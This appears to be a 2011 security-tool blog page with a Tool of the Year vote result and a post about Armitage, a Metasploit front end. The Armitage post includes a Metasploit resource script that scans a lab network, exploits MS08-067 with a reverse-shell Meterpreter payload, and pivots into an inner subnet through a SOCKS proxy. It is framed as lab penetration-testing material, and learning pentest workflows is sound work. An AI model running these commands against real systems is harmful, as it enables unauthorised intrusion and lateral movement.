As voted by you, the readers, the 2010 Toolsmith Tool of the Year is SIFT 2.0.
The SANS Investigative Forensic Toolkit (SIFT) Workstation Version 2.0, as discussed in May's ISSA Journal, is a Linux distribution that is preconfigured for forensic investigations. Created by Rob Lee for the SANS 508 track, SIFT 2.0 includes all the tools a forensic analyst/incident responder would require to conduct a thorough system investigation. I particularly favor it for memory analysis - grab a memory image from your victim system; pull it back to your SIFT VM and get down to business in no time flat.
Of 76 votes, SIFT 2.0 came in first with 24 votes (31.6%).
Rounding out the top five:
2) Firefox Addons for Security Practitioners with 20 votes (26.3%)
3) SamuraiWTF with 18 votes (23.7%)
4) NetWitness Investigator with 12 votes (15.8%)
5) Confessor and MOLE with 8 votes (10.5%)
On behalf of the ISSA Journal and me, congratulations to Rob Lee and his team!
Please support the Open Security Foundation (OSVDB)
Monday, January 31, 2011
Monday, January 03, 2011
toolsmith: Armitage - Cyber Attack Management for Metasploit
Raphael Mudge's Armitage is the subject of January 2011's toolsmith in the ISSA Journal.
Armitage is a "cyber attack management" platform for Metasploit.
Depending on your background, or the availability of commercial tools in your environment (Core, Canvas, etc.), your comfort with Metasploit likely varies with the depth of your experience. Armitage is designed to help close some of those experience or comfort gaps; the developer describes it as useful for "non-hackers".
As a demonstration tool for showing management or customers a vulnerability and its exploitation, Armitage is excellent.
Basic Armitage workflow (should be familiar to all pentesters):
Create a workspace, conduct or import scans, identify vulnerabilities, determine appropriate attacks, gain access, and further your presence in the environment.
I've always loved the premise of attack pivoting: gain a foothold on one system, then jump off to another host or network. Armitage definitely supports such thinking. ;-)
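The workflow and the pivot described above, expressed as the underlying Metasploit console commands that Armitage drives. This is an added example for this page, not Armitage's or Raphael Mudge's code; the workspace name, the 192.168.56.0/24 lab range, the 10.10.10.0/24 inner subnet, the attacker address 192.168.56.1, and the choice of an unpatched Windows XP SP3 lab box vulnerable to MS08-067 as the first target are all assumptions. It is a msfconsole resource script; run it with `msfconsole -q -r armitage_workflow.rc` after the database is connected.

```msf
# armitage_workflow.rc  (added example; assumed lab addresses throughout)

# 1. Create a workspace so this engagement's hosts/services stay separate.
workspace -a lab_jan2011

# 2. Conduct a scan. db_nmap stores hosts and services in the workspace
#    (assumed lab range; -O needs root).
db_nmap -sV -O 192.168.56.0/24
hosts
services -p 139,445,3389

# 3. Identify vulnerabilities. Note: db_nmap alone fills hosts/services;
#    the vulns table is populated by importing Nessus/Nexpose/OpenVAS
#    output with db_import, e.g.  db_import /tmp/lab_scan.nessus
vulns

# 4. Determine the attack and gain access. Module choice is an assumption:
#    a lab host at 192.168.56.101 left unpatched for MS08-067.
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.56.101
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.56.1
exploit -j -z
sessions -l

# 5. Further your presence: pivot. Route the assumed inner subnet through
#    session 1 (the Meterpreter session opened above).
route add 10.10.10.0 255.255.255.0 1
route print

# nmap does NOT follow Metasploit routes, so scan through the pivot with
# Metasploit's own scanner modules (or expose the route via a SOCKS proxy).
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.10.10.0/24
set PORTS 22,80,135,139,445,3389
run

# Optional: a SOCKS4a listener so external tools can ride the pivot via proxychains.
use auxiliary/server/socks4a
set SRVPORT 1080
run -j
```

The caveat worth remembering from the last part: once a route is added, only traffic generated inside the framework (scanner and exploit modules, or whatever you push through the SOCKS listener) traverses the session; running nmap from the shell against 10.10.10.0/24 will go out the attacker's own interface and see nothing.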
Download BackTrack 4 R2, install Armitage, and see what you think. I enjoyed testing it for this article immensely; I believe you'll find it equally useful.
Download the article here.
Cheers.
Saturday, January 01, 2011
Help choose the 2010 Toolsmith Tool of the Year
Rather than choose the best of 2010 myself, I need your help choosing the 2010 Toolsmith Tool of the Year.
We covered a lot of excellent information security-related tools in 2010; which one did you believe was the best?
I appreciate you taking the time to make your choice here.
Results will be announced February 1, 2011.